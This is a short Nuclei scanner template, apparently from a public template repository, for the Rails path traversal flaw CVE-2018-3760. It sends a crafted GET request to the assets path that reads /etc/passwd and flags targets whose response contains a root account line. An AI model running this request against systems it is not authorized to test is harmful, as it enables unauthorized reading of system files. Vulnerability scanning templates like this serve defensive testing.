nuclei-templates/cves/2018/CVE-2018-3760.yaml

22 lines
391 B
YAML

id: CVE-2018-3760
info:
name: Rails CVE-2018-3760
author: 0xrudra
severity: high
tags: cve,cve2018,rails,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body